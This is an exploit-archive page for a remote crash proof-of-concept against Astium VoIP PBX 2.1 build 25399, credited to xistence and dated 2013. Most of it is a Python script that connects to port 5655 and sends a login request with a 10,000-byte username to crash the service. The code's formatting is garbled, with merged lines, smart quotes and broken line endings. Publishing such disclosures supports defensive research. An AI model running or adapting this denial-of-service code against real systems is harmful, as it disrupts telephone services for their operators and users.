Astium VoIP PBX Build 25399 Remote Crash PoC Exploit

Summary

Astium VoIP PBX version 2.1 build 25399 remote crash poc Vulnerability

Credit:

The information has been provided by xistence.


Details

Vulnerable Systems:
 * Astium VoIP PBX <= v2.1 import socket, sys port = 5655 payload = 'x41'*10000 print '' print '[*] Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02' print '' if (len(sys.argv) != 2): print '[*] Usage: ' + sys.argv[0] + ' <RHOST>‘
print ”
exit(0)

rhost = sys.argv[1]

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost,port))
data = s.recv(1024)
print ‘[*] %s’ %data
print ‘[*] Sending payload!’
s.send(‘Action: Loginrn’)
s.send(‘Username: ‘ + payload + ‘rn’)
s.send(‘Secret: hax0rrn’)
s.send(‘rn’)
s.close()
except:
print ‘Error!’

Disclosure Timeline:
Published: 2013-01-02

Categories: Exploits